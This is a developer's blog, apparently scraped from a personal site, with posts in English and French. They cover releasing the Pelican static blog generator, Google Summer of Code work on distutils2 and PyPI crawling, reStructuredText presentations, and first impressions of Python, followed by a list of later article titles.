Those days, I’ve wrote a little python application to fit my blogging needs. I’m an occasional blogger, a vim lover, I like restructured text and DVCSes, so I’ve made a little tool that makes good use of all that.

Pelican (for calepin) is just a simple tool to generate your blog as static files, letting you using your editor of choice (vim!). It’s easy to extend, and has a template support (via jinja2).

I’ve made it to fit my needs. I hope it will fit yours, but maybe it wont, and it have not be designed to feet everyone’s needs.

Need an example ? You’re looking at it ! This weblog is using pelican to be generated, also for the atom feeds.

I’ve released it under AGPL, since I want all the modifications to be profitable to all the users.

You can find a repository to fork at https://github.com/getpelican/pelican/. feel free to hack it !

If you just want to get started, use your installer of choice (pip, easy_install, …) And then have a look to the help (pelican —help)

$ pip install pelican

Usage

Here’s a sample usage of pelican

$ pelican .
writing /home/alexis/projets/notmyidea.org/output/index.html
writing /home/alexis/projets/notmyidea.org/output/tags.html
writing /home/alexis/projets/notmyidea.org/output/categories.html
writing /home/alexis/projets/notmyidea.org/output/archives.html
writing /home/alexis/projets/notmyidea.org/output/category/python.html
writing
/home/alexis/projets/notmyidea.org/output/pelican-a-simple-static-blog-generator-in-python.html
Done !

You also can use the —help option for the command line to get more informations

$pelican --help
usage: pelican [-h] [-t TEMPLATES] [-o OUTPUT] [-m MARKUP] [-s SETTINGS] [-b]
               path

A tool to generate a static blog, with restructured text input files.

positional arguments:
  path                  Path where to find the content files (default is
                        "content").

optional arguments:
  -h, --help            show this help message and exit
  -t TEMPLATES, --templates-path TEMPLATES
                        Path where to find the templates. If not specified,
                        will uses the ones included with pelican.
  -o OUTPUT, --output OUTPUT
                        Where to output the generated files. If not specified,
                        a directory will be created, named "output" in the
                        current path.
  -m MARKUP, --markup MARKUP
                        the markup language to use. Currently only
                        ReSTreucturedtext is available.
  -s SETTINGS, --settings SETTINGS
                        the settings of the application. Default to None.
  -b, --debug

Enjoy :)

An amazing summer of code working on distutils2

2010-08-16T00:00:00+02:00

The Google Summer of Code I’ve spent working on distutils2 is over. It was a really amazing experience, for many reasons.

First of all, we had a very good team, we were 5 students working on distutils2: Zubin, Éric, Josip, Konrad and me. In addition, Mouad have worked on the PyPI testing infrastructure. You could find what each person have done on the wiki page of distutils2.

We were in contact with each others really often, helping us when possible (in #distutils), and were continuously aware of the state of the work of each participant. This, in my opinion, have bring us in a good shape.

Then, I’ve learned a lot. Python packaging was completely new to me at the time of the GSoC start, and I was pretty unfamiliar with python good practices too, as I’ve been introducing myself to python in the late 2009.

I’ve recently looked at some python code I wrote just three months ago, and I was amazed to think about many improvements to made on it. I guess this is a good indicator of the path I’ve traveled since I wrote it.

This summer was awesome because I’ve learned about python good practices, now having some strong mercurial knowledge, and I’ve seen a little how the python community works.

Then, I would like to say a big thanks to all the mentors that have hanged around while needed, on IRC or via mail, and especially my mentor for this summer, Tarek Ziadé.

Thanks a lot for your motivation, your leadership and your cheerfulness, even with a new-born and a new work!

Why ?

I wanted to work on python packaging because, as the time pass, we were having a sort of complex tools in this field. Each one wanted to add features to distutils, but not in a standard way.

Now, we have PEPs that describes some format we agreed on (see PEP 345), and we wanted to have a tool on which users can base their code on, that’s distutils2.

My job

I had to provide a way to crawl the PyPI indexes in a simple way, and do some installation / uninstallation scripts.

All the work done is available in my bitbucket repository.

Crawling the PyPI indexes

There are two ways of requesting informations from the indexes: using the “simple” index, that is a kind of REST index, and using XML-RPC.

I’ve done the two implementations, and a high level API to query those twos. Basically, this supports the mirroring infrastructure defined in PEP 381. So far, the work I’ve done is gonna be used in pip (they’ve basically copy/paste the code, but this will change as soon as we get something completely stable for distutils2), and that’s a good news, as it was the main reason for what I’ve done that.

I’ve tried to have an unified API for the clients, to switch from one to another implementation easily. I’m already thinking of adding others crawlers to this stuff, and it was made to be extensible.

If you want to get more informations about the crawlers/PyPI clients, please refer to the distutils2 documentation, especially the pages about indexes.

You can find the changes I made about this in the distutils2 source code .

Installation / Uninstallation scripts

Next step was to think about an installation script, and an uninstaller. I’ve not done the uninstaller part, and it’s a smart part, as it’s basically removing some files from the system, so I’ll probably do it in a near future.

distutils2 provides a way to install distributions, and to handle dependencies between releases. For now, this support is only about the last version of the METADATA (1.2) (See, the PEP 345), but I’m working on a compatibility layer for the old metadata, and for the informations provided via PIP requires.txt, for instance.

Extra work

Also, I’ve done some extra work. this includes:

working on the PEP 345, and having some discussion about it (about the names of some fields).
writing a PyPI server mock, useful for tests. you can find more information about it on the documentation.

Futures plans

As I said, I’ve enjoyed working on distutils2, and the people I’ve met here are really pleasant to work with. So I want to continue contributing on python, and especially on python packaging, because there is still a lot of things to do in this scope, to get something really usable.

I’m not plainly satisfied by the work I’ve done, so I’ll probably tweak it a bit: the installer part is not yet completely finished, and I want to add support for a real REST index in the future.

We’ll talk again of this in the next months, probably, but we definitely need a real REST API for PyPI, as the “simple” index is an ugly hack, in my opinion. I’ll work on a serious proposition about this, maybe involving CouchDB, as it seems to be a good option for what we want here.

Issues

I’ve encountered some issues during this summer. The main one is that’s hard to work remotely, especially being in the same room that we live, with others. I like to just think about a project with other people, a paper and a pencil, no computers. This have been not so possible at the start of the project, as I needed to read a lot of code to understand the codebase, and then to read/write emails.

I’ve finally managed to work in an office, so good point for home/office separation.

I’d not planned there will be so a high number of emails to read, in order to follow what’s up in the python world, and be a part of the community seems to takes some times to read/write emails, especially for those (like me) that arent so confortable with english (but this had brought me some english fu !).

Thanks !

A big thanks to Graine Libre and Makina Corpus, which has offered me to come into their offices from time to time, to share they cheerfulness ! Many thanks too to the Google Summer of Code program for setting up such an initiative. If you’re a student, if you’re interested about FOSS, dont hesitate any second, it’s a really good opportunity to work on interesting projects!

Sprinting on distutils2 in Tours

2010-07-10T00:00:00+02:00

date
2010-07-06
category
tech

Yesterday, as I was traveling to Tours, I’ve took some time to visit Éric, another student who’s working on distutils2 this summer, as a part of the GSoC. Basically, it was to take a drink, discuss a bit about distutils2, our respective tasks and general feelings, and to put a face on a pseudonym. I’d really enjoyed this time, because Éric knows a lot of things about mercurial and python good practices, and I’m eager to learn about those. So, we have discussed about things, have not wrote so much code, but have some things to propose so far, about documentation, and I also provides here some bribes of conversations we had.

Documentation

While writing the PyPI simple index crawler documentation, I realized that we miss some structure, or how-to about the documentation. Yep, you read well. We lack documentation on how to make documentation. Heh. We’re missing some rules to follow, and this lead to a not-so-structured final documentation. We probably target three type of publics, and we can split the documentation regarding those:

Packagers who want to distribute their softwares.
End users who need to understand how to use end user commands, like the installer/uninstaller
packaging coders who use distutils2, as a base for building a package manager.

We also need to discuss about a pattern to follow while writing documentation. How many parts do we need ? Where to put the API description ? etc. That’s maybe seems to be not so important, but I guess the readers would appreciate to have the same structure all along distutils2 documentation.

Mercurial

I’m really not a mercurial power user. I use it on daily basis, but I lack of basic knowledge about it. Big thanks Éric for sharing yours with me, you’re of a great help. We have talked about some mercurial extensions that seems to make the life simpler, while used the right way. I’ve not used them so far, so consider this as a personal note.

hg histedit, to edit the history
hg crecord, to select the changes to commit

We have spent some time to review a merge I made sunday, to re-merge it, and commit the changes as a new changeset. Awesome. These things make me say I need to read the hg book, and will do as soon as I got some spare time: mercurial seems to be simply great. So … Great. I’m a powerful merger now !

On using tools

Because we also are hackers, we have shared a bit our ways to code, the tools we use, etc. Both of us were using vim, and I’ve discovered vimdiff and hgtk, which will completely change the way I navigate into the mercurial history. We aren’t “power users”, so we have learned from each other about vim tips. You can find my dotfiles on github, if it could help. They’re not perfect, and not intended to be, because changing all the time, as I learn. Don’t hesitate to have a look, and to propose enhancements if you have !

On being pythonic

My background as an old Java user disserves me so far, as the paradigms are not the same while coding in python. Hard to find the more pythonic way to do, and sometimes hard to unlearn my way to think about software engineering. Well, it seems that the only solution is to read code, and to re-read import this from times to times ! Coding like a pythonista seems to be a must-read, so, I know what to do.

Conclusion

It was really great. Next time, we’ll need to focus a bit more on distutils2, and to have a bullet list of things to do, but days like this one are opportunities to catch ! We’ll probably do another sprint in a few weeks, stay tuned !

Introducing the distutils2 index crawlers

2010-07-06T00:00:00+02:00

I’m working for about a month for distutils2, even if I was being a bit busy (as I had some class courses and exams to work on)

I’ll try do sum-up my general feelings here, and the work I’ve made so far. You can also find, if you’re interested, my weekly summaries in a dedicated wiki page.

General feelings

First, and it’s a really important point, the GSoC is going very well, for me as for other students, at least from my perspective. It’s a pleasure to work with such enthusiast people, as this make the global atmosphere very pleasant to live.

First of all, I’ve spent time to read the existing codebase, and to understand what we’re going to do, and what’s the rationale to do so.

It’s really clear for me now: what we’re building is the foundations of a packaging infrastructure in python. The fact is that many projects co-exists, and comes all with their good concepts. Distutils2 tries to take the interesting parts of all, and to provide it in the python standard libs, respecting the recently written PEP about packaging.

With distutils2, it will be simpler to make “things” compatible. So if you think about a new way to deal with distributions and packaging in python, you can use the Distutils2 APIs to do so.

Tasks

My main task while working on distutils2 is to provide an installation and an un-installation command, as described in PEP 376. For this, I first need to get informations about the existing distributions (what’s their version, name, metadata, dependencies, etc.)

The main index, you probably know and use, is PyPI. You can access it at http://pypi.python.org.

PyPI index crawling

There is two ways to get these informations from PyPI: using the simple API, or via xml-rpc calls.

A goal was to use the version specifiers defined inPEP 345 and to provides a way to sort the grabbed distributions depending our needs, to pick the version we want/need.

Using the simple API

The simple API is composed of HTML pages you can access at http://pypi.python.org/simple/.

Distribute and Setuptools already provides a crawler for that, but it deals with their internal mechanisms, and I found that the code was not so clear as I want, that’s why I’ve preferred to pick up the good ideas, and some implementation details, plus re-thinking the global architecture.

The rules are simple: each project have a dedicated page, which allows us to get informations about:

the distribution download locations (for some versions)
homepage links
some other useful informations, as the bugtracker address, for instance.

If you want to find all the distributions of the “EggsAndSpam” project, you could do the following (do not take so attention to the names here, as the API will probably change a bit):

>>> index = SimpleIndex()
>>> index.find("EggsAndSpam")
[EggsAndSpam 1.1, EggsAndSpam 1.2, EggsAndSpam 1.3]

We also could use version specifiers:

>>> index.find("EggsAndSpam (< =1.2)")
[EggsAndSpam 1.1, EggsAndSpam 1.2]

Internally, what’s done here is the following:

it process the http://pypi.python.org/simple/FooBar/ page, searching for download URLs.
for each found distribution download URL, it creates an object, containing informations about the project name, the version and the URL where the archive remains.
it sort the found distributions, using version numbers. The default behavior here is to prefer source distributions (over binary ones), and to rely on the last “final” distribution (rather than beta, alpha etc. ones)

So, nothing hard or difficult here.

We provides a bunch of other features, like relying on the new PyPI mirroring infrastructure or filter the found distributions by some criterias. If you’re curious, please browse the distutils2 documentation.

Using xml-rpc

We also can make some xmlrpc calls to retreive informations from PyPI. It’s a really more reliable way to get informations from from the index (as it’s just the index that provides the informations), but cost processes on the PyPI distant server.

For now, this way of querying the xmlrpc client is not available on Distutils2, as I’m working on it. The main pieces are already present (I’ll reuse some work I’ve made from the SimpleIndex querying, and some code already set up), what I need to do is to provide a xml-rpc PyPI mock server, and that’s on what I’m actually working on.

Processes

For now, I’m trying to follow the “documentation, then test, then code” path, and that seems to be really needed while working with a community. Code is hard to read/understand, compared to documentation, and it’s easier to change.

While writing the simple index crawling work, I must have done this to avoid some changes on the API, and some loss of time.

Also, I’ve set up a schedule, and the goal is to be sure everything will be ready in time, for the end of the summer. (And now, I need to learn to follow schedules …)

Use Restructured Text (ReST) to power your presentations

2010-06-25T00:00:00+02:00

date
2010-06-25
category
tech

Wednesday, we give a presentation, with some friends, about the CouchDB Database, to the Toulouse local LUG. Thanks a lot to all the presents for being there, it was a pleasure to talk about this topic with you. Too bad the season is over now an I quit Toulouse next year.

During our brainstorming about the topic, we used some paper, and we wanted to make a presentation the simpler way. First thing that come to my mind was using restructured text, so I’ve wrote a simple file containing our different bullet points. In fact, there is quite nothing to do then, to have a working presentation.

So far, I’ve used the rst2pdf program, and a simple template, to generate output. It’s probably simple to have similar results using latex + beamer, I’ll try this next time, but as I’m not familiar with latex syntax, restructured text was a great option.

Here are the final PDF output, Rhe ReST source, the theme used, and the command line to generate the PDF:

rst2pdf couchdb.rst -b1 -s ../slides.style

first week working on distutils2

2010-06-04T00:00:00+02:00

As I’ve been working on Distutils2 during the past week, taking part of the GSOC program, here is a short summary of what I’ve done so far.

As my courses are not over yet, I’ve not worked as much as I wanted, and this will continues until the end of June. My main tasks are about making installation and uninstallation commands, to have a simple way to install distributions via Distutils2.

To do this, we need to rely on informations provided by the Python Package Index (PyPI), and there is at least two ways to retreive informations from here: XML-RPC and the “simple” API.

So, I’ve been working on porting some Distribute related stuff to Distutils2, cutting off all non distutils’ things, as we do not want to depend from Distribute’s internals. My main work has been about reading the whole code, writing tests about this and making those tests possible.

In fact, there was a need of a pypi mocked server, and, after reading and introducing myself to the distutils behaviors and code, I’ve taken some time to improve the work Konrad makes about this mock.

A PyPI Server mock

The mock is embeded in a thread, to make it available during the tests, in a non blocking way. We first used WSGI and wsgiref in order control what to serve, and to log the requests made to the server, but finally realised that wsgiref is not python 2.4 compatible (and we need to be python 2.4 compatible in Distutils2).

So, we switched to BaseHTTPServer and SimpleHTTPServer, and updated our tests accordingly. It’s been an opportunity to realize that WSGI has been a great step forward for making HTTP servers, and expose a really simplest way to discuss with HTTP !

You can find the modifications I made, and the related docs about this on my bitbucket distutils2 clone.

The PyPI Simple API

So, back to the main problematic: make a python library to access and request information stored on PyPI, via the simple API. As I said, I’ve just grabbed the work made from Distribute, and played a bit with, in order to view what are the different use cases, and started to write the related tests.

The work to come

So, once all use cases covered with tests, I’ll rewrite a bit the grabbed code, and do some software design work (to not expose all things as privates methods, have a clear API, and other things like this), then update the tests accordingly and write a documentation to make this clear.

Next step is to a little client, as I’ve already started here I’ll take you updated !

A Distutils2 GSoC

2010-05-01T00:00:00+02:00

WOW. I’ve been accepted to be a part of the Google Summer Of Code program, and will work on python distutils2, with a lot of (intersting !) people.

So, it’s about building the successor of Distutils2, ie. “the python package manager”. Today, there is too many ways to package a python application (pip, setuptools, distribute, distutils, etc.) so there is a huge effort to make in order to make all this packaging stuff interoperable, as pointed out by the PEP 376.

In more details, I’m going to work on the Installer / Uninstaller features of Distutils2, and on a PyPI XML-RPC client for distutils2. Here are the already defined tasks:

Implement Distutils2 APIs described in PEP 376.
Add the uninstall command.
think about a basic installer / uninstaller script. (with deps) — similar to pip/easy_install
in a pypi subpackage;
Integrate a module similar to setuptools’ package_index’
PyPI XML-RPC client for distutils 2: http://bugs.python.org/issue8190

As I’m relatively new to python, I’ll need some extra work in order to apply all good practice, among other things that can make a developper-life joyful. I’ll post here, each week, my advancement, and my tought about python and especialy python packaging world.

Python ? go !

2009-12-17T00:00:00+01:00

Cela fait maintenant un peu plus d’un mois que je travaille sur un projet en django, et que, nécessairement, je me forme à Python. Je prends un plaisir non dissimulé à découvrir ce langage (et à l’utiliser), qui ne cesse de me surprendre. Les premiers mots qui me viennent à l’esprit à propos de Python, sont “logique” et “simple”. Et pourtant puissant pour autant. Je ne manque d’ailleurs pas une occasion pour faire un peu d’évangélisation auprès des quelques personnes qui veulent bien m’écouter.

The Zen of Python

Avant toute autre chose, je pense utile de citer Tim Peters, et le PEP20, qui constituent une très bonne introduction au langage, qui prends la forme d’un easter egg présent dans python

>>> import this
The Zen of Python, by Tim Peters

Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!

J’ai la vague impression que c’est ce que j’ai toujours cherché à faire en PHP, et particulièrement dans le framework Spiral, mais en ajoutant ces concepts dans une sur-couche au langage. Ici, c’est directement de l’esprit de python qu’il s’agit, ce qui signifie que la plupart des bibliothèques python suivent ces concepts. Elle est pas belle la vie ?

Comment commencer, et par ou ?

Pour ma part, j’ai commencé par la lecture de quelques livres et articles intéressants, qui constituent une bonne entrée en matière sur le sujet (La liste n’est bien évidemment pas exhaustive et vos commentaires sont les bienvenus) :

Dive into python
A byte of python
Python: petit guide à l’usage du développeur agile de Tarek Ziadé
La documentation officielle python, bien sûr !
Les vidéos du pyconfr 2009!
Un peu de temps, et une console python ouverte :)

J’essaye par ailleurs de partager au maximum les ressources que je trouve de temps à autres, que ce soit via twitter ou via mon compte delicious. Allez jeter un œil au tag python sur mon profil, peut être que vous trouverez des choses intéressantes, qui sait!

Un python sexy

Quelques fonctionnalités qui devraient vous mettre l’eau à la bouche:

Le chaînage des opérateurs de comparaison est possible (a\<b \<c dans une condition)
Assignation de valeurs multiples (il est possible de faire a,b,c = 1,2,3 par exemple)
Les listes sont simples à manipuler !
Les list comprehension, ou comment faire des opérations complexes sur les listes, de manière simple.
Les doctests: ou comment faire des tests directement dans la documentation de vos classes, tout en la documentant avec de vrais exemples.
Les métaclasses, ou comment contrôler la manière dont les classes se construisent
Python est un langage à typage fort dynamique: c’est ce qui m’agaçait avec PHP qui est un langage à typage faible dynamique.

Cous pouvez également aller regarder l’atelier donné par Victor Stinner durant le Pyconfr 09. Have fun !

Alexis Métaireau - code

Changing the primary key of a model in Django

Generating UUIDs in pure python

Getting the constraint name

Using uuids in URLs in a Django app

Adding collaboration on uMap, third update

JavaScript modules

Internals

Naming matters

Leaflet layers and uMap features

GeoJSON and Leaflet

This is not reactive programming

A syncing proof of concept

Syncing map properties

Websockets

Code architecture

Syncing features

What’s next ?

Returning objects from an arrow function

Format an USB disk from the command-line on MacOSX

Rescuing a broken asahi linux workstation

Using pelican to track my worked and volunteer hours

Reading information from the titles

The markdown preprocessor

Plugging this with pelican

Adding a graph

Adding Real-Time Collaboration to uMap, second week

The optimistic-merge approach

Using SQLite in the browser

Related projects in the SIG field

How to transport the data?

Server-Sent Events (SSE)

Importing a PostgreSQL dump under a different database name

Decrypting the dump

Importing while changing ACLs and database name

Deploying and customizing datasette

Adding authentication

Using templates

Adding Real-Time Collaboration to uMap, first week

Installation

And you’re done!

How it’s currently working

Data

Real-time collaboration : the different approaches

JSON Patch and JSON Merge Patch

Using CRDTs

Using Datasette for tracking my professional activity

Using DISTINCT in Parent-Child Relationships

Convert string to duration

llm command-line tips

Setting up a IRC Bouncer with ZNC

Installation of ZNC

Weechat configuration

How to run the vigogne model locally

Creating a simple command line to post snippets on Gitlab

Creating an online space to share markdown files

Conversion d’un fichier svg en favicon.ico

Découverte de nouveaux outils pour le développement: LLM, Helix et plus

LLM

Helix

Divers

Running the Gitlab CI locally

ArchLinux et mise à jour du keyring

Python packaging with Hatch, pipx and Zsh environment variables

Isolating system packages

Manipulating env variables with Zsh

Profiling and speeding up Django and Pytest

Changing the hashing algorithm to speedup tests

Speeding DNS lookups

Installation de Mosquitto, InfluxDB, Telegraf et Grafana

Installer et se connecter au serveur

Configurer les DNS

Installer Mosquitto

Vérifions que tout fonctionne comme prévu :

Installation d’InfluxDB et Telegraf

Configuration de Telegraf

Installation de Grafana

Nginx

Groupement d’achats & partage d’expérience

Organisation